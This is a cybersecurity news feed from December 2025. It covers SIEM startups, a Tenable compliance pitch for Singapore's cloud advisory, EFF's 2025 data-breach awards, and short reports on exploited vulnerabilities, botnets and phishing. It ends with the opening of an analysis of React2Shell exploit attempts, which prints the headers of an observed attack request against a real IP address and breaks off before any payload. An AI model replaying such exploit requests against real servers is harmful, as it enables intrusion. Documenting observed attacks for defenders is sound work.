Received today — 17 December 2025

Cybersecurity

Why Venture Capital Is Betting Against Traditional SIEMs

17 December 2025 at 16:29

And why most of the arguments do not hold up under scrutiny

Over the past 18 to 24 months, venture capital has flowed into a fresh wave of SIEM challengers including Vega (which raised $65M in seed and Series A at a ~$400M valuation), Perpetual Systems, RunReveal, Iceguard, Sekoia, Cybersift, Ziggiz, and Abstract Security, all […]

The post Why Venture Capital Is Betting Against Traditional SIEMs first appeared on Future of Tech and Security: Strategy & Innovation with Raffy.

The post Why Venture Capital Is Betting Against Traditional SIEMs appeared first on Security Boulevard.

Cybersecurity Crossed the AI Rubicon: Why 2025 Marked a Point of No Return

17 December 2025 at 10:14

For years, artificial intelligence sat at the edges of cybersecurity conversations. It appeared in product roadmaps, marketing claims, and isolated detection use cases, but rarely altered the fundamental dynamics between attackers and defenders. That changed in 2025. This year marked a clear inflection point where AI became operational on both sides of the threat landscape.

The post Cybersecurity Crossed the AI Rubicon: Why 2025 Marked a Point of No Return appeared first on Seceon Inc.

The post Cybersecurity Crossed the AI Rubicon: Why 2025 Marked a Point of No Return appeared first on Security Boulevard.

When Zero-Days Go Active: What Ongoing Windows, Chrome, and Apple Exploits Reveal About Modern Intrusion Risk

17 December 2025 at 10:06

A series of actively exploited zero-day vulnerabilities affecting Windows, Google Chrome, and Apple platforms was disclosed in mid-December, according to The Hacker News, reinforcing a persistent reality for defenders: attackers no longer wait for exposure windows to close. They exploit them immediately. Unlike large-scale volumetric attacks that announce themselves through disruption, zero-day exploitation operates quietly.

The post When Zero-Days Go Active: What Ongoing Windows, Chrome, and Apple Exploits Reveal About Modern Intrusion Risk appeared first on Seceon Inc.

The post When Zero-Days Go Active: What Ongoing Windows, Chrome, and Apple Exploits Reveal About Modern Intrusion Risk appeared first on Security Boulevard.

Complying with the Monetary Authority of Singapore’s Cloud Advisory: How Tenable Can Help

17 December 2025 at 09:00

The Monetary Authority of Singapore’s cloud advisory, part of its 2021 Technology Risk Management Guidelines, advises financial institutions to move beyond siloed monitoring to adopt a continuous, enterprise-wide approach. These firms must undergo annual audits. Here’s how Tenable can help.

Key takeaways:

  1. High-stakes compliance: The MAS requires all financial institutions in Singapore to meet mandatory technology risk and cloud security guidelines and document compliance. Non-compliance can lead to severe financial penalties and business restrictions. Any third-party providers used by Singapore financial institutions must also comply with the standards.
     
  2. The proactive mandate: Compliance requires a shift from static compliance checks to a continuous, proactive approach to managing exposure. This approach is essential for securing the key cloud risk areas mandated by MAS: identity and access management (IAM) and securing applications in the public cloud.
     
  3. How to get there: Effective risk mitigation means breaking the most dangerous attack paths. Tenable Cloud Security, available in the Tenable One Exposure Management Platform, provides continuous monitoring, eliminates over-privileged permissions, and addresses misconfiguration risk.

Complying with government cybersecurity regulations can lull organizations into a false sense of security and lead to an over-reliance on point-in-time assessments conducted at irregular intervals. While such compliance efforts are essential to pass audits, they may do very little to actually reduce an organization’s risk. On the other hand, government efforts like the robust framework provided by the Monetary Authority of Singapore (MAS), Singapore’s central bank and integrated financial regulator, offer valuable guidance for organizations worldwide to consider as they look to reduce cyber risk. 

The MAS framework is designed to safeguard the integrity of the country's financial systems. The framework is anchored by the MAS Technology Risk Management (TRM) Guidelines, published in January 2021, which cover a wide spectrum of risk management concerns, including IT governance, cyber resilience, incident response, and third-party risk. The TRM guidelines were supplemented by the June 2021 Advisory On Addressing The Technology And Cyber Security Risks Associated With Public Cloud Adoption.

The cloud advisory highlights key risks and control measures that Singapore’s financial institutions should consider before adopting public cloud services, including:

  • Developing a public cloud risk management strategy that takes into consideration the unique characteristics of public cloud services
  • Implementing strong controls in areas such as identity and access management (IAM), cybersecurity, data protection, and cryptographic key management
  • Expanding cybersecurity operations to include the security of public cloud workloads
  • Managing cloud resilience, outsourcing, vendor lock-in, and concentration risks
  • Ensuring the financial institution’s staff have the adequate skillsets to manage public cloud workloads and their risks.

The advisory recommends avoiding a siloed approach when performing security monitoring of on-premises apps or infrastructure and public cloud workloads. Instead, it advises financial institutions to “feed cyber-related information on public cloud workloads into their respective enterprise-wide IT security monitoring services to facilitate continuous monitoring and analysis of cyber events.” 

Who must comply with MAS TRM and the cloud advisory?

While the MAS TRM guidelines and cloud advisory do not specifically state penalties for compliance failures, they are legally binding. They apply to all financial institutions operating under the authority’s regulation in Singapore, including banks, insurers, fintech firms, payment service providers, and venture capital managers. A financial institution in Singapore that leverages the services of a firm based outside the country must ensure that its service providers also meet the TRM requirements. MAS also factors adherence to the framework into its overall risk assessment of an organization; failure to comply can damage an organization's standing and reputation.

In short, the scope of accountability to the MAS TRM guidelines and cloud advisory is broad.

Complying with the MAS cloud advisory: How Tenable can help

We evaluated how the Tenable One Exposure Management Platform with Tenable Cloud Security can assist organizations in achieving and maintaining compliance with the MAS cloud advisory. Read on to understand two of the cloud advisory’s key focus areas and how to address them effectively with Tenable One — preventing dangerous attack path vectors from compromising sensitive cloud assets.

1. Identity and access management: Enforcing least privilege access

The MAS cloud advisory calls for financial institutions to “enforce the principle of least privilege stringently” when granting access to assets in the public cloud. It further advises firms to consider adopting zero trust principles in the architecture design of applications, where “access to public cloud services and resources is evaluated and granted on a per-request and need-to basis.”

At Tenable, we believe applying least privilege in Identity Access Management (IAM) is the cornerstone for effective cloud security. In the cloud, excessive permissions on accounts that can access sensitive data are a direct route to a breach.

How Tenable can help: CIEM and sensitive data protection

The Tenable Cloud Security domain within Tenable One offers integrated cloud infrastructure entitlement management (CIEM) that enforces strict least privilege across human and machine identities in Amazon Web Services (AWS), Google Cloud Platform (GCP), Microsoft Azure, Oracle Cloud Infrastructure (OCI), and Kubernetes environments.

  • Eliminate lateral movement: CIEM analyzes policies to identify privilege escalation risks and lateral movement paths, effectively closing dangerous attack vectors.
  • Data-driven prioritization: Tenable provides automated data classification and correlates sensitive data exposure with overly permissive identities. This ensures remediation focuses on the exposures that threaten your most critical regulated data.
  • Mandatory controls: The platform automatically monitors for privileged users who lack multi-factor authentication (MFA) and checks for regular access key rotation.
Cutting-edge identity intelligence correlates overprivileged IAM identities with vulnerabilities, misconfigurations, and sensitive data to see where privilege misuse could have the greatest impact. Guided, least-privilege remediation closes these identity exposure gaps. Source: Tenable, December 2025

Here’s a detailed look at how Tenable can help with three of the cloud advisory’s IAM provisions:

MAS cloud advisory item: 10. As IAM is the cornerstone of effective cloud security risk management, FIs should enforce the principle of “least privilege” stringently when granting access to information assets in the public cloud.
How Tenable helps: Tenable provides easy visualization of effective permissions through identity intelligence and permission mapping. By querying permissions across identities, you can quickly surface problems and revoke excessive permissions with automatically generated least privilege policies.

MAS cloud advisory item: 11. Financial institutions should implement multi-factor authentication (MFA) for staff with privileges to configure public cloud services through the CSPs’ metastructure, especially staff with top-level account privileges (e.g. known as the “root user” or “subscription owner” for some CSPs).
How Tenable helps: Tenable offers detailed monitoring for privileged users, including IAM users who don't have multi-factor authentication (MFA) enabled.

MAS cloud advisory item: 12. Credentials used by system/application services for authentication in the public cloud, such as “access keys,” should be changed regularly. If the credentials are not used, they should be deleted immediately.
How Tenable helps: Tenable's audits check for this specific condition. They can identify IAM users whose access keys have not been rotated within a specified time frame (e.g., 90 days). This helps you to quickly identify and address this security vulnerability.

Source: Tenable, December 2025

2. Securing applications in the public cloud: Minimizing risk exposure

For financial institutions using microservices and containers, the MAS cloud advisory advises that, to reduce the attack surface, each container includes only the core software components needed by the application. The cloud advisory also notes that security tools made for traditional on-premises IT infrastructure (e.g. vulnerability scanners) may not run effectively on containers, and advises financial institutions to adopt container-specific security solutions for preventing, detecting, and responding to container-specific threats. For firms using IaC to provision or manage public cloud workloads, it further calls for implementing controls to minimize the risk of misconfigurations.

At Tenable, we believe this explicit mandate for specialized cloud and container security solutions underscores the need for continuous, accurate risk assessment. Tenable Cloud Security is purpose-built to meet these requirements with full Cloud Security Posture Management (CSPM) and Cloud Workload Protection (CWP) capabilities across your cloud footprint. This ability to see and protect every cloud asset — from code to container — is crucial for enabling contextual prioritization of risk. We also believe that relying solely on static vulnerability scoring systems, like the Common Vulnerability Scoring System (CVSS), is insufficient because it fails to reflect real-world exploitability. To ensure financial institutions focus remediation efforts where they matter most, Tenable Exposure Management, including Tenable Cloud Security, incorporates the Tenable Vulnerability Priority Rating (VPR) — dynamic, predictive risk scoring that allows teams to address the most immediate and exploitable threats first.

How Tenable can help: Container security and cloud-to-code traceability

Tenable unifies cloud workload protection (CWP) with cloud security posture management (CSPM) to provide continuous, contextual risk assessment.

  • Workload and container security: Tenable provides solutions tailored to your security domain:
    • For the cloud security professional: Tenable offers robust, agentless cloud workload protection capabilities that continuously scan for, detect and visualize critical risks such as vulnerabilities, sensitive data exposure, malware and misconfigurations across virtual machines, containers and serverless environments.
    • For the vulnerability management owner: Tenable offers a streamlined solution with unified visibility for hybrid environments, providing the core capabilities to extend vulnerability management best practices to cloud workloads: Tenable Cloud Vulnerability Management ensures agentless multi-cloud coverage, scanning containers in registries (shift-left) and at runtime to prevent the deployment of vulnerable images and detect drift in production.
  • Cloud-to-code traceability: This unique feature links runtime findings (e.g., an exposed workload) directly back to its IaC source code, allowing for rapid remediation and automated pull requests, minimizing misconfiguration risk as mandated by MAS.
Embed security and compliance throughout the development lifecycle, in DevOps workflows like HashiCorp Terraform and CloudFormation, to minimize risks. Detect issues in the cloud and suggest the fix in code. Source: Tenable, December 2025

Here’s a detailed look at how Tenable can help with two of the cloud advisory’s provisions related to securing applications in the public cloud:

MAS cloud advisory item: 19. Applications that run in a public cloud environment may be packaged in containers, especially for applications adopting a microservices architecture. Financial institutions should ensure that each container includes only the core software components needed by the application to reduce the attack surface. As containers typically share a host operating system, financial institutions should run containers with a similar risk profile together (e.g., based on the criticality of the service or the data that are processed) to minimize risk exposure. As security tools made for traditional on-premise[s] IT infrastructure (e.g. vulnerability scanners) may not run effectively on containers, financial institutions should adopt [a] container-specific security solution for preventing, detecting, and responding to container-specific threats.

How Tenable helps: Tenable integrates with your CI/CD pipelines and container registries to provide visibility and control throughout the container lifecycle. Here's how it works:

  • Tenable scans container images for vulnerabilities, misconfigurations, and malware as they're being built and stored in registries. This is a "shift-left" approach, which means it helps you find and fix security issues early in the development process.
  • You can create and enforce security policies based on vulnerability scores, the presence of specific malware, or other security criteria.
  • Tenable's admission controllers act as runtime guardrails, ensuring that the policies you've defined are enforced at the point of deployment. This prevents deployment of images that failed initial scans or have since been found vulnerable, even if a developer tries to bypass the standard process.

MAS cloud advisory item: 20. Financial institutions should ensure stringent control over the granting of access to container orchestrators (e.g. Kubernetes), especially the use of the orchestrator administrative account, and the orchestrators’ access to container images. To ensure that only secure container images are used, a container registry could be established to facilitate tracking of container images that have met the financial institution’s security requirements.

How Tenable helps: Tenable's Kubernetes Security Posture Management (KSPM) component continuously scans your Kubernetes resources (like pods, deployments, and namespaces) to identify misconfigurations and policy violations. This allows you to:

  • Discover and remediate vulnerabilities and misconfigurations before they can be exploited.
  • Continuously audit your environment against industry standards, like the Center for Internet Security (CIS) benchmarks for Kubernetes.
  • Get a single, centralized view of your security posture across multiple Kubernetes clusters.

Tenable’s admission controllers act as gatekeepers to your Kubernetes cluster. When a user or a system attempts to deploy a new container image, the admission controller intercepts the request before it's fully scheduled. It then checks the image against your defined security policies. Your policies can be based on factors such as:

  • Vulnerability scores (e.g., block any image with a critical vulnerability)
  • Compliance violations (e.g., block images that don't meet a specific security standard)
  • The presence of malicious software or exposed secrets

If the image violates any of these policies, the admission controller denies the deployment, preventing the vulnerable container from ever reaching production.

Source: Tenable, December 2025

Gaining the upper hand on MAS compliance through a unified ecosystem view

Tenable One is the market-leading exposure management platform, normalizing, contextualizing, and correlating security signals from all domains, including cloud — across vulnerabilities, misconfigurations, and identities spanning your hybrid estate. Exposure management enables cross-functional alignment between SecOps, DevOps, and governance, risk and compliance (GRC) teams with a shared, unified view of risk.

Tenable Cloud Security, part of Tenable One, unifies vision, insight, and action to support continuous adherence to the MAS cloud advisory across multi-cloud and hybrid environments. Source: Tenable, December 2025

Tenable Cloud Security, part of the Tenable One Exposure Management platform, supports continuous adherence to the MAS cloud advisory and enables risk-based decision-making by eliminating the toxic combinations that attackers exploit. The platform unifies security insight, transforming the effort to achieve compliance from a necessary burden into a strategic advantage.

The post Complying with the Monetary Authority of Singapore’s Cloud Advisory: How Tenable Can Help appeared first on Security Boulevard.

MSP Automation Isn’t Optional, But it Isn’t the Answer to Everything

17 December 2025 at 07:15

Raise your hand if you’ve fallen victim to a vendor-led conversation around their latest AI-driven platform over the past calendar year. Keep it up if the pitch leaned on “next-gen,” “market-shaping,” or “best-in-class” while they nudged another product into your stack. If your hand is still up, you are not alone. MSPs are the target because you sit between shrinking budgets and rising risk.

The post MSP Automation Isn’t Optional, But it Isn’t the Answer to Everything appeared first on Security Boulevard.

The Breachies 2025: The Worst, Weirdest, Most Impactful Data Breaches of the Year

Another year has come and gone, and with it, thousands of data breaches that affect millions of people. The question these days is less “Is my information in a data breach this year?” and more “How many data breaches had my information in them this year?”

Some data breaches are more noteworthy than others. Where one might affect a small number of people and include little useful information, like a name or email address, others might include data ranging from a potential medical diagnosis to specific location information. To catalog and talk about these breaches we created the Breachies, a series of tongue-in-cheek awards, to highlight the most egregious data breaches. 

In most cases, if these companies practiced a privacy-first approach and focused on data minimization, only collecting and storing what they absolutely need to provide the services they promise, many data breaches would be far less harmful to the victims. But instead, companies gobble up as much as they can, store it for as long as possible, and inevitably at some point someone decides to poke in and steal that data. Once all that personal data is stolen, it can be used against the breach victims for identity theft, ransomware attacks, and to send unwanted spam. It has become such a common occurrence that it’s easy to lose track of which breaches affect you, and just assume your information is out there somewhere. Still, a few steps can help protect your information.

With that, let’s get to the awards.

The Winners

The Say Something Without Saying Anything Award: Mixpanel

We’ve long warned that apps delivering your personal information to third parties, even if they aren’t the ad networks directly driving surveillance capitalism, present risks and a salient target for hackers. The more widespread your data, the more places attackers can go to find it. Mixpanel, a data analytics company which collects information on users of any app which incorporates its SDK, suffered a major breach in November this year. The service has been used by a wide array of companies, including the Ring Doorbell App, which we reported on back in 2020 delivering a trove of information to Mixpanel, and PornHub, which despite not having worked with the company since 2021, had its historical record of paying subscribers breached.

There’s a lot we still don’t know about this data breach, in large part because the announcement about it is so opaque, leaving reporters with unanswered questions about how many were affected, if the hackers demanded a ransom, and if Mixpanel employee accounts utilized standard security best practices. One thing is clear, though: the breach was enough for OpenAI to drop them as a provider, disclosing critical details on the breach in a blog post that Mixpanel’s own announcement conveniently failed to mention.

The worst part is that, as a data analytics company providing libraries which are included in a broad range of apps, we can surmise that the vast majority of people affected by this breach have no direct relationship with Mixpanel, and likely didn’t even know that their devices were delivering data to the company. These people deserve better than vague statements by companies which profit off of (and apparently insufficiently secure) their data.

The We Still Told You So Award: Discord

Last year, AU10TIX won our first The We Told You So Award because, as we predicted in 2023, age verification mandates would inevitably lead to more data breaches, potentially exposing government IDs as well as information about the sites that a user visits. Like clockwork, they did. It was our first We Told You So Breachies award, but we knew it wouldn’t be the last.

Unfortunately, there is growing political interest in mandating identity or age verification before allowing people to access social media or adult material. EFF and others oppose these plans because they threaten both speech and privacy.

Nonetheless, this year’s winner of The We Still Told You So Breachies Award is the messaging app, Discord — once known mainly for gaming communities, it now hosts more than 200 million monthly active users and is widely used to host fandom and community channels. 

In September of this year, much of Discord’s age verification data was breached — including users’ real names, selfies, ID documents, email and physical addresses, phone numbers, IP addresses, and other contact details or messages provided to customer support. In some cases, “limited billing information” was also accessed—including payment type, the last four digits of credit card numbers, and purchase histories. 

Technically though, it wasn’t Discord itself that was hacked but their third-party customer support provider — a company called Zendesk that was compromised, allowing attackers to access Discord’s user data. Either way, it’s Discord users who felt the impact.

The Tea for Two Award: Tea Dating Advice and TeaOnHer

Speaking of age verification, Tea, the dating safety app for women, had a pretty horrible year for data breaches. The app allows users to anonymously share reviews and safety information about their dates with men—helping keep others safe by noting red flags they saw during their date.

Since Tea is aimed at women’s safety and dating advice, the app asks new users to upload a selfie or photo ID to verify their identity and gender to create an account. That’s some pretty sensitive information that the app is asking you to trust it with! Back in July, it was reported that 72,000 images had been leaked from the app, including 13,000 images of photo IDs and 59,000 selfies. These photos were found via an exposed database hosted on Google’s mobile app development platform, Firebase. And if that isn’t bad enough, just a week later a second breach exposed private messages between users, including messages with phone numbers, abortion planning, and discussions about cheating partners. This breach included more than 1.1 million messages from early 2023 all the way to mid-2025, just before the breach was reported. Tea released a statement shortly after, temporarily disabling the chat feature.

But wait, there’s more. A completely different app based on the same idea, but for men, also suffered a data breach. TeaOnHer failed to protect similar sensitive data. In August, TechCrunch discovered that user information — including emails, usernames, and yes, those photo IDs and selfies — was accessible through a publicly available web address. Even worse? TechCrunch also found the email address and password the app’s creator uses to access the admin page.

Breaches like this are one of the reasons that EFF shouts from the rooftops against laws that mandate user verification with an ID or selfie. Every company that collects this information becomes a target for data breaches — and if a breach happens, you can’t just change your face. 

The Just Stop Using Tracking Tech Award: Blue Shield of California

Another year, another data breach caused by online tracking tools. 

In April, Blue Shield of California revealed that it had shared 4.7 million people’s health data with Google by misconfiguring Google Analytics on its website. The data, which may have been used for targeted advertising, included: people’s names, insurance plan details, medical service providers, and patient financial responsibility. The health insurance company shared this information with Google for nearly three years before realizing its mistake.

If this data breach sounds familiar, it’s because it is: last year’s Just Stop Using Tracking Tech award also went to a healthcare company that leaked patient data through tracking code on its website. Tracking tools remain alarmingly common on healthcare websites, even after years of incidents like this one. These tools are marketed as harmless analytics or marketing solutions, but can expose people’s sensitive data to advertisers and data brokers. 

EFF’s free Privacy Badger extension can block online trackers, but you shouldn’t need an extension to stop companies from harvesting and monetizing your medical data. We need a strong, federal privacy law and ban on online behavioral advertising to eliminate the incentives driving companies to keep surveilling us online. 

The Hacker's Hall Pass Award: PowerSchool

In December 2024, PowerSchool, the largest provider of student information systems in the U.S., gave hackers access to sensitive student data. The breach compromised personal information of over 60 million students and teachers, including Social Security numbers, medical records, grades, and special education data. Hackers exploited PowerSchool’s weak security—namely, stolen credentials to their internal customer support portal—and gained unfettered access to sensitive data stored by school districts across the country.

PowerSchool failed to implement basic security measures like multi-factor authentication, and the breach affected districts nationwide. In Texas alone, over 880,000 individuals’ data was exposed, prompting the state's attorney general to file a lawsuit, accusing PowerSchool of misleading its customers about security practices. Memphis-Shelby County Schools also filed suit, seeking damages for the breach and the cost of recovery.

While PowerSchool paid hackers an undisclosed sum to prevent data from being published, the company’s failure to protect its users’ data raises serious concerns about the security of K-12 educational systems. Adding to the saga, a Massachusetts student, Matthew Lane, pleaded guilty in October to hacking and extorting PowerSchool for $2.85 million in Bitcoin. Lane faces up to 17 years in prison for cyber extortion and aggravated identity theft, a reminder that not all hackers are faceless shadowy figures — sometimes they’re just a college kid.

The Worst. Customer. Service. Ever. Award: TransUnion

Credit reporting giant TransUnion had to notify its customers this year that a hack nabbed the personal information of 4.4 million people. How'd the attackers get in? According to a letter filed with the Maine Attorney General's office obtained by TechCrunch, the problem was a “third-party application serving our U.S. consumer support operations.” That's probably not the kind of support they were looking for. 

TransUnion said in a Texas filing that attackers swept up “customers’ names, dates of birth, and Social Security numbers” in the breach, though it was quick to point out in public statements that the hackers did not access credit reports or “core credit data.” While it certainly could have been worse, this breach highlights the many ways that hackers can get their hands on information. Coming in through third parties, companies that provide software or other services to businesses, is like using an unguarded side door, rather than checking in at the front desk. Companies, particularly those who keep sensitive personal information, should be sure to lock down customer information at all the entry points. After all, their decisions about who they do business with ultimately carry consequences for all of their customers — who have no say in the matter.

The Annual Microsoft Screwed Up Again Award: Microsoft

Microsoft is a company nobody feels neutral about. Especially in the infosec world. The myriad software vulnerabilities in Windows, Office, and other Microsoft products over the decades have been a source of frustration and also great financial rewards for both attackers and defenders. Yet still, as the saying goes: “nobody ever got fired for buying from Microsoft.” But perhaps, the times, they are a-changing.

In July 2025, it was revealed that a zero-day security vulnerability in Microsoft’s flagship file sharing and collaboration software, SharePoint, had led to the compromise of over 400 organizations, including major corporations and sensitive government agencies such as the National Nuclear Security Administration (NNSA), the federal agency responsible for maintaining and developing the U.S. stockpile of nuclear weapons. The attack was attributed to three different Chinese government-linked hacking groups. Amazingly, days after the vulnerability was first reported, there were still thousands of vulnerable self-hosted SharePoint servers online.

Zero-days happen to tech companies, large and small. It’s nearly impossible to write even moderately complex software that is bug- and exploit-free, and Microsoft can’t exactly be blamed for having a zero-day in their code. But when one company is the source of so many zero-days consistently for so many years, one must start wondering whether they should put all their eggs (or data) into a basket that company made. Perhaps if Microsoft’s monopolistic practices had been reined in back in the 1990s we wouldn’t be in a position today where SharePoint is the de facto file sharing software for so many major organizations. And maybe, just maybe, this is further evidence that tech monopolies and centralization of data aren’t just bad for consumer rights, civil liberties, and the economy—but also for cybersecurity.

The Silver Globe Award: Flat Earth Sun, Moon & Zodiac

Look, we’ll keep this one short: in October of last year, researchers found security issues in the flat earther app, Flat Earth, Sun, Moon, & Clock. In March of 2025, that breach was confirmed. What’s most notable about this, aside from including a surprising amount of information about gender, name, email addresses and date of birth, is that it also included users’ location info, including latitude and longitude. Huh, interesting.

The I Didn’t Even Know You Had My Information Award: Gravy Analytics

In January, hackers claimed they stole millions of people’s location history from a company that never should’ve had it in the first place: location data broker Gravy Analytics. The data included timestamped location coordinates tied to advertising IDs, which can reveal exceptionally sensitive information. In fact, researchers who reviewed the leaked data found it could be used to identify military personnel and gay people in countries where homosexuality is illegal.

The breach of this sensitive data is bad, but Gravy Analytics’s business model of regularly harvesting and selling it is even worse. Despite the fact that most people have never heard of them, Gravy Analytics has managed to collect location information from a billion phones a day. The company has sold this data to other data brokers, makers of police surveillance tools, and the U.S. government.

How did Gravy Analytics get this location information from people’s phones? The data broker industry is notoriously opaque, but this breach may have revealed some of Gravy Analytics’ sources. The leaked data referenced thousands of apps, including Microsoft apps, Candy Crush, Tinder, Grindr, MyFitnessPal, pregnancy trackers and religious-focused apps. Many of these app developers said they had no relationship with Gravy Analytics. Instead, expert analysis of the data suggests it was harvested through the advertising ecosystem already connected to most apps. This breach provides further evidence that online behavioral advertising fuels the surveillance industry.

Whether or not they get hacked, location data brokers like Gravy Analytics threaten our privacy and security. Follow EFF’s guide to protecting your location data and help us fight for legislation to dismantle the data broker industry. 

The Keeping Up With My Cybertruck Award: TeslaMate

TeslaMate, a tool meant to track Tesla vehicle data (but which is not owned or operated by Tesla itself), has become a cautionary tale about data security. In August, a security researcher found more than 1,300 self-hosted TeslaMate dashboards were exposed online, leaking sensitive information such as vehicle location, speed, charging habits, and even trip details. In essence, your Cybertruck became the star of its own Keeping Up With My Cybertruck reality show, except the audience wasn’t made up of fans interested in your lifestyle, just random people with access to the internet.

TeslaMate describes itself as “that loyal friend who never forgets anything!” — but its lack of proper security measures makes you wish it would. This breach highlights how easily location data can become a tool for harassment or worse, and the growing need for legislation that specifically protects consumer location data. Without stronger regulations around data privacy, sensitive location details like where you live, work, and travel can easily be accessed by malicious actors, leaving consumers with no recourse.

The Disorder in the Courts Award: PACER

Confidentiality is a core principle in the practice of law. But this year a breach of confidentiality came from an unexpected source: a breach of the federal court filing system. In August, Politico reported that hackers infiltrated the Case Management/Electronic Case Files (CM/ECF) system, which uses the same database as PACER, a searchable public database for court records. Of particular concern? The possibility that the attack exposed the names of confidential informants involved in federal cases from multiple court districts. Courts across the country acted quickly to set up new processes to avoid the possibility of further compromises.

The leak followed a similar incident in 2021 and came on the heels of a warning to Congress that the file system is more than a little creaky. In fact, an IT official from the federal court system told the House Judiciary Committee that both systems are “unsustainable due to cyber risks, and require replacement.”

The Only Stalkers Allowed Award: Catwatchful

Just like last year, a stalkerware company was subject to a data breach that really should prove once and for all that these companies must be stopped. In this case, Catwatchful is an Android spyware company that sells itself as a “child monitoring app.” Like other products in this category, it’s designed to operate covertly while uploading the contents of a victim’s phone, including photos, messages, and location information.

This data breach was particularly harmful, as it included not just the email addresses and passwords of the customers who purchased the app to install on a victim’s phone, but also data from the devices of 26,000 victims, which could include the victims’ photos, messages, and real-time location data.

This was a tough award to decide on because Catwatchful wasn’t the only stalkerware company that was hit this year. Similar breaches to SpyX, Cocospy, and Spyic were all strong contenders. EFF has worked tirelessly to raise the alarm on this sort of software, and this year worked with AV Comparatives to test the stalkerware detection rate on Android of various major antivirus apps.

The Why We’re Still Stuck on Unique Passwords Award: Plex

Every year, we all get a reminder about why using unique passwords for all our accounts is crucial for protecting our online identities. This time around, the award goes to Plex, who experienced a data breach that included customer emails, usernames, and hashed passwords (which is a fancy way of saying passwords are scrambled through an algorithm, but it is possible they could still be deciphered).

If this all sounds vaguely familiar to you for some reason, that’s because a similar issue also happened to Plex in 2022, affecting 15 million users. Whoops.

This is why it is important to use unique passwords everywhere. A password manager, including one that might be free on your phone or browser, makes this much easier to do. Likewise, credential stuffing illustrates why it’s important to use two-factor authentication. Here’s how to turn that on for your Plex account.

The Uh, Yes, Actually, I Have Been Pwned Award: Troy Hunt’s Mailing List

Troy Hunt, the person behind Have I Been Pwned? and who has more experience with data breaches than just about anyone, also proved that anyone can be pwned. In a blog post, he details what happened to his mailing list:

You know when you're really jet lagged and really tired and the cogs in your head are just moving that little bit too slow? That's me right now, and the penny has just dropped that a Mailchimp phish has grabbed my credentials, logged into my account and exported the mailing list for this blog.

And he continues later:

I'm enormously frustrated with myself for having fallen for this, and I apologise to anyone on that list. Obviously, watch out for spam or further phishes and check back here or via the social channels in the nav bar above for more.

The whole blog is worth a read as a reminder that phishing can get anyone, and we thank Troy Hunt for his feedback on this and other breaches to include this year.

Tips to Protect Yourself

Data breaches are such a common occurrence that it’s easy to feel like there’s nothing you can do, nor any point in trying. But privacy isn’t dead. While some information about you is almost certainly out there, that’s no reason for despair. In fact, it’s a good reason to take action.

There are steps you can take right now with all your online accounts to best protect yourself from the next data breach (and the next, and the next):

  • Use unique passwords on all your online accounts. This is made much easier by using a password manager, which can generate and store those passwords for you. When you have a unique password for every website, a data breach of one site won’t cascade to others.
  • Use two-factor authentication when a service offers it. Two-factor authentication makes your online accounts more secure by requiring additional proof (“factors”) alongside your password when you log in. While two-factor authentication adds another step to the login process, it’s a great way to help keep out anyone not authorized, even if your password is breached.
  • Delete old accounts: Sometimes, you’ll get a data breach notification for an account you haven’t used in years. This can be a nice reminder to delete that account, but it’s better to do so before a data breach happens, when possible. Try to make it a habit to go through and delete old accounts once a year or so. 
  • Freeze your credit. Many experts recommend freezing your credit with the major credit bureaus as a way to protect against the sort of identity theft that’s made possible by some data breaches. Freezing your credit prevents someone from opening up a new line of credit in your name without additional information, like a PIN or password, to “unfreeze” the account. This might sound absurd considering they can’t even open bank accounts, but if you have kids, you can freeze their credit too.
  • Keep a close eye out for strange medical bills. With the number of health companies breached this year, it’s also a good idea to watch for healthcare fraud. The Federal Trade Commission recommends watching for strange bills, letters from your health insurance company for services you didn’t receive, and letters from debt collectors claiming you owe money. 

(Dis)Honorable Mentions

According to one report, 2025 had already seen 2,563 data breaches by October, which puts the year on track to be one of the worst by the sheer number of breaches.

We did not investigate every one of these 2,500-plus data breaches, but we looked at a lot of them, including the news coverage and the data breach notification letters that many state Attorney General offices host on their websites. We can’t award the coveted Breachies Award to every company that was breached this year. Still, here are some (dis)honorable mentions we wanted to highlight:

Salesforce, F5, Oracle, WorkComposer, Raw, Stiizy, Ohio Medical Alliance LLC, Hello Cake, Lovense, Kettering Health, LexisNexis, WhatsApp, Nexar, McDonalds, Congressional Budget Office, Doordash, Louis Vuitton, Adidas, Columbia University, Hertz, HCRG Care Group, Lexipol, Color Dating, Workday, Aflac, and Coinbase. And a special nod to last minute entrants Home Depot, 700Credit, and Petco.

What now? Companies need to do a better job of only collecting the information they need to operate, and properly securing what they store. Also, the U.S. needs to pass comprehensive privacy protections. At the very least, we need to be able to sue companies when these sorts of breaches happen (and while we’re at it, it’d be nice if we got more than $5.21 checks in the mail). EFF has long advocated for a strong federal privacy law that includes a private right of action.

SonicWall Fixes Actively Exploited CVE-2025-40602 in SMA 100 Appliances

17 December 2025 at 13:17
SonicWall has rolled out fixes to address a security flaw in Secure Mobile Access (SMA) 100 series appliances that it said has been actively exploited in the wild. The vulnerability, tracked as CVE-2025-40602 (CVSS score: 6.6), concerns a case of local privilege escalation that arises as a result of insufficient authorization in the appliance management console (AMC). It affects the following

Kimwolf Botnet Hijacks 1.8 Million Android TVs, Launches Large-Scale DDoS Attacks

17 December 2025 at 13:09
A new distributed denial-of-service (DDoS) botnet known as Kimwolf has enlisted a massive army of no less than 1.8 million infected devices comprising Android-based TVs, set-top boxes, and tablets, and may be associated with another botnet known as AISURU, according to findings from QiAnXin XLab. "Kimwolf is a botnet compiled using the NDK [Native Development Kit]," the company said in a report

APT28 Targets Ukrainian UKR-net Users in Long-Running Credential Phishing Campaign

17 December 2025 at 10:30
The Russian state-sponsored threat actor known as APT28 has been attributed to what has been described as a "sustained" credential-harvesting campaign targeting users of UKR[.]net, a webmail and news service popular in Ukraine. The activity, observed by Recorded Future's Insikt Group between June 2024 and April 2025, builds upon prior findings from the cybersecurity company in May 2024 that

New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails

17 December 2025 at 09:54
The threat actor linked to Operation ForumTroll has been attributed to a fresh set of phishing attacks targeting individuals within Russia, according to Kaspersky. The Russian cybersecurity vendor said it detected the new activity in October 2025. The origins of the threat actor are presently unknown. "While the spring cyberattacks focused on organizations, the fall campaign honed in on

Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th)

17 December 2025 at 12:12

I have already talked about various React2Shell exploit attempts we have observed in the last weeks. But new varieties of the exploit are popping up, and the most recent one is using this particular version of the exploit:

POST /app HTTP/1.1
Host: 81.187.66.58
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Next-Action: 0
Rsc-Action: 0
Content-Length: 388
